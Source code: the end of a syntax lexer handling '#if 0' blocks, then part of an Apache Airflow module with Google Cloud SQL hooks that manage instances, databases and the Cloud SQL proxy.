            (r"[^\\']+", String.Regex),
            (r"\\'?", String.Regex),
            (r"'", String.Regex, '#pop')
        ]
    }
    def get_tokens_unprocessed(self, text, **kwargs):
        """Yield tokens, demoting everything inside a preprocessor region
        that is statically false (``#if 0`` / ``#if nil``) to ``Comment``,
        tracking nested ``#if``/``#endif`` via ``if_false_level``."""
        pp = r'^%s*#%s*' % (self._ws_pp, self._ws_pp)
        if_false_level = 0
        for index, token, value in (
                RegexLexer.get_tokens_unprocessed(self, text, **kwargs)):
            if if_false_level == 0:  # Not in a false #if
                if (token is Comment.Preproc and
                        re.match(r'%sif%s+(0|nil)%s*$\n?' %
                                 (pp, self._ws_pp, self._ws_pp), value)):
                    if_false_level = 1
            else:  # In a false #if
                if token is Comment.Preproc:
                    if (if_false_level == 1 and
                            re.match(r'%sel(if|se)\b' % pp, value)):
                        if_false_level = 0
                    elif re.match(r'%sif' % pp, value):
                        if_false_level += 1
                    elif re.match(r'%sendif\b' % pp, value):
                        if_false_level -= 1
                else:
                    token = Comment
            yield index, token, value
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains a Google Cloud SQL Hook."""
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import socket
import string
import subprocess
import time
import uuid
from pathlib import Path
from subprocess import PIPE, Popen
from typing import Any, Dict, List, Optional, Sequence, Union
from urllib.parse import quote_plus
import httpx
from googleapiclient.discovery import Resource, build
from googleapiclient.errors import HttpError
from sqlalchemy.orm import Session
from airflow.exceptions import AirflowException
# Number of retries - used by googleapiclient method calls to perform retries
# For requests that are "retriable"
from airflow.hooks.base import BaseHook
from airflow.models import Connection
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
from airflow.providers.mysql.hooks.mysql import MySqlHook
from airflow.providers.postgres.hooks.postgres import PostgresHook
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
# Maximum length of the sun_path field of an AF_UNIX socket address on
# Linux; presumably used to validate unix-socket paths for the Cloud SQL
# proxy -- confirm against CloudSqlProxyRunner usage.
UNIX_PATH_MAX = 108
# Time to sleep between active checks of the operation results
TIME_TO_SLEEP_IN_SECONDS = 20
class CloudSqlOperationStatus:
    """Helper class with operation statuses."""
    # Values of the ``status`` field of a Cloud SQL operation resource;
    # DONE is polled for in CloudSQLHook._wait_for_operation_to_complete.
    PENDING = "PENDING"
    RUNNING = "RUNNING"
    DONE = "DONE"
    UNKNOWN = "UNKNOWN"
class CloudSQLHook(GoogleBaseHook):
    """
    Hook for Google Cloud SQL APIs.
    All the methods in the hook where project_id is used must be called with
    keyword arguments rather than positional.
    :param api_version: This is the version of the api.
    :type api_version: str
    :param gcp_conn_id: The Airflow connection used for GCP credentials.
    :type gcp_conn_id: str
    :param delegate_to: This performs a task on one host with reference to other hosts.
    :type delegate_to: Optional[str]
    :param impersonation_chain: This is the optional service account to impersonate using short term
        credentials.
    :type impersonation_chain: Optional[str]
    """
    conn_name_attr = 'gcp_conn_id'
    default_conn_name = 'google_cloud_default'
    conn_type = 'gcpcloudsql'
    hook_name = 'Google Cloud SQL'
    def __init__(
        self,
        api_version: str,
        gcp_conn_id: str = default_conn_name,
        delegate_to: Optional[str] = None,
        impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
    ) -> None:
        super().__init__(
            gcp_conn_id=gcp_conn_id,
            delegate_to=delegate_to,
            impersonation_chain=impersonation_chain,
        )
        self.api_version = api_version
        # Lazily-built sqladmin API client; see get_conn().
        self._conn = None
    def get_conn(self) -> Resource:
        """
        Retrieves connection to Cloud SQL.
        :return: Google Cloud SQL services object.
        :rtype: googleapiclient.discovery.Resource
        """
        if not self._conn:
            http_authorized = self._authorize()
            # cache_discovery=False: skip the discovery-document cache.
            self._conn = build('sqladmin', self.api_version, http=http_authorized, cache_discovery=False)
        return self._conn
    @GoogleBaseHook.fallback_to_default_project_id
    def get_instance(self, instance: str, project_id: str) -> dict:
        """
        Retrieves a resource containing information about a Cloud SQL instance.
        :param instance: Database instance ID. This does not include the project ID.
        :type instance: str
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: A Cloud SQL instance resource.
        :rtype: dict
        """
        return (
            self.get_conn()
            .instances()
            .get(project=project_id, instance=instance)
            .execute(num_retries=self.num_retries)
        )
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def create_instance(self, body: Dict, project_id: str) -> None:
        """
        Creates a new Cloud SQL instance.
        :param body: Body required by the Cloud SQL insert API, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/insert#request-body.
        :type body: dict
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .instances()
            .insert(project=project_id, body=body)
            .execute(num_retries=self.num_retries)
        )
        # The insert call is asynchronous; block until the operation finishes.
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def patch_instance(self, body: dict, instance: str, project_id: str) -> None:
        """
        Updates settings of a Cloud SQL instance.
        Caution: This is not a partial update, so you must include values for
        all the settings that you want to retain.
        :param body: Body required by the Cloud SQL patch API, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/patch#request-body.
        :type body: dict
        :param instance: Cloud SQL instance ID. This does not include the project ID.
        :type instance: str
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .instances()
            .patch(project=project_id, instance=instance, body=body)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def delete_instance(self, instance: str, project_id: str) -> None:
        """
        Deletes a Cloud SQL instance.
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :param instance: Cloud SQL instance ID. This does not include the project ID.
        :type instance: str
        :return: None
        """
        response = (
            self.get_conn()
            .instances()
            .delete(project=project_id, instance=instance)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    def get_database(self, instance: str, database: str, project_id: str) -> dict:
        """
        Retrieves a database resource from a Cloud SQL instance.
        :param instance: Database instance ID. This does not include the project ID.
        :type instance: str
        :param database: Name of the database in the instance.
        :type database: str
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: A Cloud SQL database resource, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases#resource.
        :rtype: dict
        """
        return (
            self.get_conn()
            .databases()
            .get(project=project_id, instance=instance, database=database)
            .execute(num_retries=self.num_retries)
        )
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def create_database(self, instance: str, body: Dict, project_id: str) -> None:
        """
        Creates a new database inside a Cloud SQL instance.
        :param instance: Database instance ID. This does not include the project ID.
        :type instance: str
        :param body: The request body, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases/insert#request-body.
        :type body: dict
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .databases()
            .insert(project=project_id, instance=instance, body=body)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def patch_database(
        self,
        instance: str,
        database: str,
        body: Dict,
        project_id: str,
    ) -> None:
        """
        Updates a database resource inside a Cloud SQL instance.
        This method supports patch semantics.
        See https://cloud.google.com/sql/docs/mysql/admin-api/how-tos/performance#patch.
        :param instance: Database instance ID. This does not include the project ID.
        :type instance: str
        :param database: Name of the database to be updated in the instance.
        :type database: str
        :param body: The request body, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/databases/patch#request-body.
        :type body: dict
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .databases()
            .patch(project=project_id, instance=instance, database=database, body=body)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def delete_database(self, instance: str, database: str, project_id: str) -> None:
        """
        Deletes a database from a Cloud SQL instance.
        :param instance: Database instance ID. This does not include the project ID.
        :type instance: str
        :param database: Name of the database to be deleted in the instance.
        :type database: str
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .databases()
            .delete(project=project_id, instance=instance, database=database)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    @GoogleBaseHook.operation_in_progress_retry()
    def export_instance(self, instance: str, body: Dict, project_id: str) -> None:
        """
        Exports data from a Cloud SQL instance to a Cloud Storage bucket as a SQL dump
        or CSV file.
        :param instance: Database instance ID of the Cloud SQL instance. This does not include the
            project ID.
        :type instance: str
        :param body: The request body, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/export#request-body
        :type body: dict
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        response = (
            self.get_conn()
            .instances()
            .export(project=project_id, instance=instance, body=body)
            .execute(num_retries=self.num_retries)
        )
        operation_name = response["name"]
        self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
    @GoogleBaseHook.fallback_to_default_project_id
    def import_instance(self, instance: str, body: Dict, project_id: str) -> None:
        """
        Imports data into a Cloud SQL instance from a SQL dump or CSV file in
        Cloud Storage.
        :param instance: Database instance ID. This does not include the
            project ID.
        :type instance: str
        :param body: The request body, as described in
            https://cloud.google.com/sql/docs/mysql/admin-api/v1beta4/instances/import#request-body
        :type body: dict
        :param project_id: Project ID of the project that contains the instance. If set
            to None or missing, the default project_id from the Google Cloud connection is used.
        :type project_id: str
        :return: None
        """
        try:
            response = (
                self.get_conn()
                .instances()
                .import_(project=project_id, instance=instance, body=body)
                .execute(num_retries=self.num_retries)
            )
            operation_name = response["name"]
            self._wait_for_operation_to_complete(project_id=project_id, operation_name=operation_name)
        except HttpError as ex:
            # Wrap API errors so callers deal with a single exception type.
            raise AirflowException(f'Importing instance {instance} failed: {ex.content}')
    def _wait_for_operation_to_complete(self, project_id: str, operation_name: str) -> None:
        """
        Waits for the named operation to complete - checks status of the
        asynchronous call.
        :param project_id: Project ID of the project that contains the instance.
        :type project_id: str
        :param operation_name: Name of the operation.
        :type operation_name: str
        :return: None
        :raises AirflowException: if the finished operation reports errors.
        """
        service = self.get_conn()
        # Poll the operation until DONE, sleeping between checks. There is
        # no timeout here; a stuck operation will block indefinitely.
        while True:
            operation_response = (
                service.operations()
                .get(project=project_id, operation=operation_name)
                .execute(num_retries=self.num_retries)
            )
            if operation_response.get("status") == CloudSqlOperationStatus.DONE:
                error = operation_response.get("error")
                if error:
                    # Extracting the errors list as string and trimming square braces
                    error_msg = str(error.get("errors"))[1:-1]
                    raise AirflowException(error_msg)
                # No meaningful info to return from the response in case of success
                return
            time.sleep(TIME_TO_SLEEP_IN_SECONDS)
# URL template for the latest cloud_sql_proxy binary; placeholders are
# (platform system, processor architecture), e.g. ("linux", "amd64").
CLOUD_SQL_PROXY_DOWNLOAD_URL = "https://dl.google.com/cloudsql/cloud_sql_proxy.{}.{}"
# URL template for a specific proxy version; placeholders are
# (version, platform system, processor architecture).
CLOUD_SQL_PROXY_VERSION_DOWNLOAD_URL = (
    "https://storage.googleapis.com/cloudsql-proxy/{}/cloud_sql_proxy.{}.{}"
)
# Keys of the Google Cloud connection "extra" fields that carry credentials.
GCP_CREDENTIALS_KEY_PATH = "extra__google_cloud_platform__key_path"
GCP_CREDENTIALS_KEYFILE_DICT = "extra__google_cloud_platform__keyfile_dict"
class CloudSqlProxyRunner(LoggingMixin):
    """
    Downloads and runs cloud-sql-proxy as subprocess of the Python process.

    The cloud-sql-proxy needs to be downloaded and started before we can connect
    to the Google Cloud SQL instance via database connection. It establishes
    secure tunnel connection to the database. It authorizes using the
    Google Cloud credentials that are passed by the configuration.

    More details about the proxy can be found here:
    https://cloud.google.com/sql/docs/mysql/sql-proxy

    :param path_prefix: Unique path prefix where proxy will be downloaded and
        directories created for unix sockets.
    :type path_prefix: str
    :param instance_specification: Specification of the instance to connect the
        proxy to. It should be specified in the form that is described in
        https://cloud.google.com/sql/docs/mysql/sql-proxy#multiple-instances in
        -instances parameter (typically in the form of ``<project>:<region>:<instance>``
        for UNIX socket connections and in the form of
        ``<project>:<region>:<instance>=tcp:<port>`` for TCP connections.
    :type instance_specification: str
    :param gcp_conn_id: Id of Google Cloud connection to use for
        authentication
    :type gcp_conn_id: str
    :param project_id: Optional id of the Google Cloud project to connect to - it overwrites
        default project id taken from the Google Cloud connection.
    :type project_id: str
    :param sql_proxy_version: Specific version of SQL proxy to download
        (for example 'v1.13'). By default latest version is downloaded.
    :type sql_proxy_version: str
    :param sql_proxy_binary_path: If specified, then proxy will be
        used from the path specified rather than dynamically generated. This means
        that if the binary is not present in that path it will also be downloaded.
    :type sql_proxy_binary_path: str
    """

    def __init__(
        self,
        path_prefix: str,
        instance_specification: str,
        gcp_conn_id: str = 'google_cloud_default',
        project_id: Optional[str] = None,
        sql_proxy_version: Optional[str] = None,
        sql_proxy_binary_path: Optional[str] = None,
    ) -> None:
        super().__init__()
        self.path_prefix = path_prefix
        if not self.path_prefix:
            raise AirflowException("The path_prefix must not be empty!")
        self.sql_proxy_was_downloaded = False
        self.sql_proxy_version = sql_proxy_version
        self.download_sql_proxy_dir = None
        self.sql_proxy_process = None  # type: Optional[Popen]
        self.instance_specification = instance_specification
        self.project_id = project_id
        self.gcp_conn_id = gcp_conn_id
        self.command_line_parameters = []  # type: List[str]
        # UNIX sockets are created directly under the path prefix.
        self.cloud_sql_proxy_socket_directory = self.path_prefix
        self.sql_proxy_path = (
            sql_proxy_binary_path if sql_proxy_binary_path else self.path_prefix + "_cloud_sql_proxy"
        )
        self.credentials_path = self.path_prefix + "_credentials.json"
        self._build_command_line_parameters()

    def _build_command_line_parameters(self) -> None:
        """Build the base proxy arguments: socket directory and instance spec."""
        self.command_line_parameters.extend(['-dir', self.cloud_sql_proxy_socket_directory])
        self.command_line_parameters.extend(['-instances', self.instance_specification])

    @staticmethod
    def _is_os_64bit() -> bool:
        """Return True when running on a 64-bit machine."""
        return platform.machine().endswith('64')

    def _download_sql_proxy_if_needed(self) -> None:
        """Download the proxy binary to ``sql_proxy_path`` unless it already exists.

        :raises AirflowException: when the download request does not return HTTP 200.
        """
        if os.path.isfile(self.sql_proxy_path):
            self.log.info("cloud-sql-proxy is already present")
            return
        system = platform.system().lower()
        processor = "amd64" if CloudSqlProxyRunner._is_os_64bit() else "386"
        if not self.sql_proxy_version:
            download_url = CLOUD_SQL_PROXY_DOWNLOAD_URL.format(system, processor)
        else:
            download_url = CLOUD_SQL_PROXY_VERSION_DOWNLOAD_URL.format(
                self.sql_proxy_version, system, processor
            )
        proxy_path_tmp = self.sql_proxy_path + ".tmp"
        self.log.info("Downloading cloud_sql_proxy from %s to %s", download_url, proxy_path_tmp)
        # NOTE(review): `allow_redirects` is the pre-0.20 httpx spelling
        # (renamed to `follow_redirects` later) - confirm the pinned httpx version.
        response = httpx.get(download_url, allow_redirects=True)
        if response.status_code != 200:
            # Fail before writing anything so we don't leave a garbage .tmp
            # binary behind. httpx exposes `reason_phrase`, not requests'
            # `reason` - using the wrong attribute raised AttributeError here.
            raise AirflowException(
                "The cloud-sql-proxy could not be downloaded. Status code = {}. "
                "Reason = {}".format(response.status_code, response.reason_phrase)
            )
        # Downloading to .tmp file first to avoid case where partially downloaded
        # binary is used by parallel operator which uses the same fixed binary path
        with open(proxy_path_tmp, 'wb') as file:
            file.write(response.content)
        self.log.info("Moving sql_proxy binary from %s to %s", proxy_path_tmp, self.sql_proxy_path)
        shutil.move(proxy_path_tmp, self.sql_proxy_path)
        os.chmod(self.sql_proxy_path, 0o744)  # Set executable bit
        self.sql_proxy_was_downloaded = True

    @provide_session
    def _get_credential_parameters(self, session: Session) -> List[str]:
        """Derive ``-credential_file`` / ``-projects`` proxy arguments from the
        Google Cloud connection stored in the Airflow DB."""
        connection = session.query(Connection).filter(Connection.conn_id == self.gcp_conn_id).first()
        session.expunge_all()
        if connection.extra_dejson.get(GCP_CREDENTIALS_KEY_PATH):
            credential_params = ['-credential_file', connection.extra_dejson[GCP_CREDENTIALS_KEY_PATH]]
        elif connection.extra_dejson.get(GCP_CREDENTIALS_KEYFILE_DICT):
            # Materialize the inline keyfile dict to a file the proxy can read.
            credential_file_content = json.loads(connection.extra_dejson[GCP_CREDENTIALS_KEYFILE_DICT])
            self.log.info("Saving credentials to %s", self.credentials_path)
            with open(self.credentials_path, "w") as file:
                json.dump(credential_file_content, file)
            credential_params = ['-credential_file', self.credentials_path]
        else:
            self.log.info(
                "The credentials are not supplied by neither key_path nor "
                "keyfile_dict of the gcp connection %s. Falling back to "
                "default activated account",
                self.gcp_conn_id,
            )
            credential_params = []
        if not self.instance_specification:
            # Forwarding all instances of a project requires an explicit project id.
            project_id = connection.extra_dejson.get('extra__google_cloud_platform__project')
            if self.project_id:
                project_id = self.project_id
            if not project_id:
                raise AirflowException(
                    "For forwarding all instances, the project id "
                    "for Google Cloud should be provided either "
                    "by project_id extra in the Google Cloud connection or by "
                    "project_id provided in the operator."
                )
            credential_params.extend(['-projects', project_id])
        return credential_params

    def start_proxy(self) -> None:
        """
        Starts Cloud SQL Proxy.

        You have to remember to stop the proxy if you started it!

        :raises AirflowException: if the proxy is already running, exits early,
            or reports an error on stderr before becoming ready.
        """
        self._download_sql_proxy_if_needed()
        if self.sql_proxy_process:
            raise AirflowException(f"The sql proxy is already running: {self.sql_proxy_process}")
        else:
            command_to_run = [self.sql_proxy_path]
            command_to_run.extend(self.command_line_parameters)
            self.log.info("Creating directory %s", self.cloud_sql_proxy_socket_directory)
            Path(self.cloud_sql_proxy_socket_directory).mkdir(parents=True, exist_ok=True)
            command_to_run.extend(self._get_credential_parameters())
            self.log.info("Running the command: `%s`", " ".join(command_to_run))
            self.sql_proxy_process = Popen(command_to_run, stdin=PIPE, stdout=PIPE, stderr=PIPE)
            self.log.info("The pid of cloud_sql_proxy: %s", self.sql_proxy_process.pid)
            # Read the proxy's stderr until it either reports readiness,
            # reports an error, or exits.
            while True:
                line = (
                    self.sql_proxy_process.stderr.readline().decode('utf-8')
                    if self.sql_proxy_process.stderr
                    else ""
                )
                return_code = self.sql_proxy_process.poll()
                if line == '' and return_code is not None:
                    self.sql_proxy_process = None
                    raise AirflowException(
                        f"The cloud_sql_proxy finished early with return code {return_code}!"
                    )
                if line != '':
                    self.log.info(line)
                if "googleapi: Error" in line or "invalid instance name:" in line:
                    self.stop_proxy()
                    raise AirflowException(f"Error when starting the cloud_sql_proxy {line}!")
                if "Ready for new connections" in line:
                    return

    def stop_proxy(self) -> None:
        """
        Stops running proxy.

        You should stop the proxy after you stop using it.
        Also removes the socket directory, any downloaded binary and any
        generated credentials file.
        """
        if not self.sql_proxy_process:
            raise AirflowException("The sql proxy is not started yet")
        else:
            self.log.info("Stopping the cloud_sql_proxy pid: %s", self.sql_proxy_process.pid)
            self.sql_proxy_process.kill()
            self.sql_proxy_process = None
        # Cleanup!
        self.log.info("Removing the socket directory: %s", self.cloud_sql_proxy_socket_directory)
        shutil.rmtree(self.cloud_sql_proxy_socket_directory, ignore_errors=True)
        if self.sql_proxy_was_downloaded:
            self.log.info("Removing downloaded proxy: %s", self.sql_proxy_path)
            # Silently ignore if the file has already been removed (concurrency)
            try:
                os.remove(self.sql_proxy_path)
            except OSError as e:
                if e.errno != errno.ENOENT:
                    raise
        else:
            self.log.info("Skipped removing proxy - it was not downloaded: %s", self.sql_proxy_path)
        if os.path.isfile(self.credentials_path):
            self.log.info("Removing generated credentials file %s", self.credentials_path)
            # Here file cannot be delete by concurrent task (each task has its own copy)
            os.remove(self.credentials_path)

    def get_proxy_version(self) -> Optional[str]:
        """Returns version of the Cloud SQL Proxy, or None if it cannot be parsed."""
        self._download_sql_proxy_if_needed()
        command_to_run = [self.sql_proxy_path]
        command_to_run.extend(['--version'])
        command_to_run.extend(self._get_credential_parameters())
        result = subprocess.check_output(command_to_run).decode('utf-8')
        # NOTE: `[V|v]` also matches a literal '|'; harmless here, kept as-is.
        pattern = re.compile("^.*[V|v]ersion ([^;]*);.*$")
        matched = pattern.match(result)
        if matched:
            return matched.group(1)
        else:
            return None

    def get_socket_path(self) -> str:
        """
        Retrieves UNIX socket path used by Cloud SQL Proxy.

        :return: The dynamically generated path for the socket created by the proxy.
        :rtype: str
        """
        return self.cloud_sql_proxy_socket_directory + "/" + self.instance_specification
# Connection URI templates keyed by database type -> connection style
# ("proxy" or "public") -> variant. Placeholders are filled in by
# CloudSQLDatabaseHook._generate_connection_uri().
CONNECTION_URIS = {
    "postgres": {
        "proxy": {
            "tcp": "postgresql://{user}:{password}@127.0.0.1:{proxy_port}/{database}",
            "socket": "postgresql://{user}:{password}@{socket_path}/{database}",
        },
        "public": {
            "ssl": "postgresql://{user}:{password}@{public_ip}:{public_port}/{database}?"
            "sslmode=verify-ca&"
            "sslcert={client_cert_file}&"
            "sslkey={client_key_file}&"
            "sslrootcert={server_ca_file}",
            "non-ssl": "postgresql://{user}:{password}@{public_ip}:{public_port}/{database}",
        },
    },
    "mysql": {
        "proxy": {
            "tcp": "mysql://{user}:{password}@127.0.0.1:{proxy_port}/{database}",
            "socket": "mysql://{user}:{password}@localhost/{database}?unix_socket={socket_path}",
        },
        "public": {
            "ssl": "mysql://{user}:{password}@{public_ip}:{public_port}/{database}?ssl={ssl_spec}",
            "non-ssl": "mysql://{user}:{password}@{public_ip}:{public_port}/{database}",
        },
    },
}  # type: Dict[str, Dict[str, Dict[str, str]]]

# Database types accepted in the `database_type` connection extra.
CLOUD_SQL_VALID_DATABASE_TYPES = ['postgres', 'mysql']
class CloudSQLDatabaseHook(BaseHook):
    """Serves DB connection configuration for Google Cloud SQL (Connections
    of *gcpcloudsqldb://* type).

    The hook is a "meta" one. It does not perform an actual connection.
    It is there to retrieve all the parameters configured in gcpcloudsql:// connection,
    start/stop Cloud SQL Proxy if needed, dynamically generate Postgres or MySQL
    connection in the database and return an actual Postgres or MySQL hook.
    The returned Postgres/MySQL hooks are using direct connection or Cloud SQL
    Proxy socket/TCP as configured.

    Main parameters of the hook are retrieved from the standard URI components:

    * **user** - User name to authenticate to the database (from login of the URI).
    * **password** - Password to authenticate to the database (from password of the URI).
    * **public_ip** - IP to connect to for public connection (from host of the URI).
    * **public_port** - Port to connect to for public connection (from port of the URI).
    * **database** - Database to connect to (from schema of the URI).

    Remaining parameters are retrieved from the extras (URI query parameters):

    * **project_id** - Optional, Google Cloud project where the Cloud SQL
       instance exists. If missing, default project id passed is used.
    * **instance** - Name of the instance of the Cloud SQL database instance.
    * **location** - The location of the Cloud SQL instance (for example europe-west1).
    * **database_type** - The type of the database instance (MySQL or Postgres).
    * **use_proxy** - (default False) Whether SQL proxy should be used to connect to Cloud
      SQL DB.
    * **use_ssl** - (default False) Whether SSL should be used to connect to Cloud SQL DB.
      You cannot use proxy and SSL together.
    * **sql_proxy_use_tcp** - (default False) If set to true, TCP is used to connect via
      proxy, otherwise UNIX sockets are used.
    * **sql_proxy_binary_path** - Optional path to Cloud SQL Proxy binary. If the binary
      is not specified or the binary is not present, it is automatically downloaded.
    * **sql_proxy_version** -  Specific version of the proxy to download (for example
      v1.13). If not specified, the latest version is downloaded.
    * **sslcert** - Path to client certificate to authenticate when SSL is used.
    * **sslkey** - Path to client private key to authenticate when SSL is used.
    * **sslrootcert** - Path to server's certificate to authenticate when SSL is used.

    :param gcp_cloudsql_conn_id: URL of the connection
    :type gcp_cloudsql_conn_id: str
    :param gcp_conn_id: The connection ID used to connect to Google Cloud for
        cloud-sql-proxy authentication.
    :type gcp_conn_id: str
    :param default_gcp_project_id: Default project id used if project_id not specified
        in the connection URL
    :type default_gcp_project_id: str
    """

    conn_name_attr = 'gcp_cloudsql_conn_id'
    default_conn_name = 'google_cloud_sql_default'
    conn_type = 'gcpcloudsqldb'
    hook_name = 'Google Cloud SQL Database'
    _conn = None  # type: Optional[Any]

    def __init__(
        self,
        gcp_cloudsql_conn_id: str = 'google_cloud_sql_default',
        gcp_conn_id: str = 'google_cloud_default',
        default_gcp_project_id: Optional[str] = None,
    ) -> None:
        super().__init__()
        self.gcp_conn_id = gcp_conn_id
        self.gcp_cloudsql_conn_id = gcp_cloudsql_conn_id
        self.cloudsql_connection = self.get_connection(self.gcp_cloudsql_conn_id)
        self.extras = self.cloudsql_connection.extra_dejson
        self.project_id = self.extras.get('project_id', default_gcp_project_id)  # type: Optional[str]
        self.instance = self.extras.get('instance')  # type: Optional[str]
        self.database = self.cloudsql_connection.schema  # type: Optional[str]
        self.location = self.extras.get('location')  # type: Optional[str]
        self.database_type = self.extras.get('database_type')  # type: Optional[str]
        self.use_proxy = self._get_bool(self.extras.get('use_proxy', 'False'))  # type: bool
        self.use_ssl = self._get_bool(self.extras.get('use_ssl', 'False'))  # type: bool
        self.sql_proxy_use_tcp = self._get_bool(self.extras.get('sql_proxy_use_tcp', 'False'))  # type: bool
        self.sql_proxy_version = self.extras.get('sql_proxy_version')  # type: Optional[str]
        self.sql_proxy_binary_path = self.extras.get('sql_proxy_binary_path')  # type: Optional[str]
        self.user = self.cloudsql_connection.login  # type: Optional[str]
        self.password = self.cloudsql_connection.password  # type: Optional[str]
        self.public_ip = self.cloudsql_connection.host  # type: Optional[str]
        self.public_port = self.cloudsql_connection.port  # type: Optional[int]
        self.sslcert = self.extras.get('sslcert')  # type: Optional[str]
        self.sslkey = self.extras.get('sslkey')  # type: Optional[str]
        self.sslrootcert = self.extras.get('sslrootcert')  # type: Optional[str]
        # Port and socket path and db_hook are automatically generated
        self.sql_proxy_tcp_port = None
        self.sql_proxy_unique_path = None  # type: Optional[str]
        self.db_hook = None  # type: Optional[Union[PostgresHook, MySqlHook]]
        self.reserved_tcp_socket = None  # type: Optional[socket.socket]
        # Generated based on clock + clock sequence. Unique per host (!).
        # This is important as different hosts share the database
        self.db_conn_id = str(uuid.uuid1())
        self._validate_inputs()

    @staticmethod
    def _get_bool(val: Any) -> bool:
        """Interpret a connection-extra value as a boolean.

        Extras usually arrive as strings; treat the string 'False' - and an
        actual boolean False (previously mis-read as True) - as False,
        everything else as True.
        """
        if val == 'False' or val is False:
            return False
        return True

    @staticmethod
    def _check_ssl_file(file_to_check, name) -> None:
        """Raise if an SSL file path is unset or does not point at a file."""
        if not file_to_check:
            raise AirflowException(f"SSL connections requires {name} to be set")
        if not os.path.isfile(file_to_check):
            raise AirflowException(f"The {file_to_check} must be a readable file")

    def _validate_inputs(self) -> None:
        """Validate required extras and the proxy/SSL exclusivity constraint."""
        if self.project_id == '':
            raise AirflowException("The required extra 'project_id' is empty")
        if not self.location:
            raise AirflowException("The required extra 'location' is empty or None")
        if not self.instance:
            raise AirflowException("The required extra 'instance' is empty or None")
        if self.database_type not in CLOUD_SQL_VALID_DATABASE_TYPES:
            raise AirflowException(
                "Invalid database type '{}'. Must be one of {}".format(
                    self.database_type, CLOUD_SQL_VALID_DATABASE_TYPES
                )
            )
        if self.use_proxy and self.use_ssl:
            raise AirflowException(
                "Cloud SQL Proxy does not support SSL connections."
                " SSL is not needed as Cloud SQL Proxy "
                "provides encryption on its own"
            )

    def validate_ssl_certs(self) -> None:
        """
        SSL certificates validator.

        :return: None
        """
        if self.use_ssl:
            self._check_ssl_file(self.sslcert, "sslcert")
            self._check_ssl_file(self.sslkey, "sslkey")
            self._check_ssl_file(self.sslrootcert, "sslrootcert")

    def validate_socket_path_length(self) -> None:
        """
        Validates sockets path length.

        :return: None or rises AirflowException
        """
        if self.use_proxy and not self.sql_proxy_use_tcp:
            if self.database_type == 'postgres':
                # Postgres appends its own suffix to the socket directory.
                suffix = "/.s.PGSQL.5432"
            else:
                suffix = ""
            expected_path = "{}/{}:{}:{}{}".format(
                self._generate_unique_path(), self.project_id, self.instance, self.database, suffix
            )
            if len(expected_path) > UNIX_PATH_MAX:
                self.log.info("Too long (%s) path: %s", len(expected_path), expected_path)
                raise AirflowException(
                    "The UNIX socket path length cannot exceed {} characters "
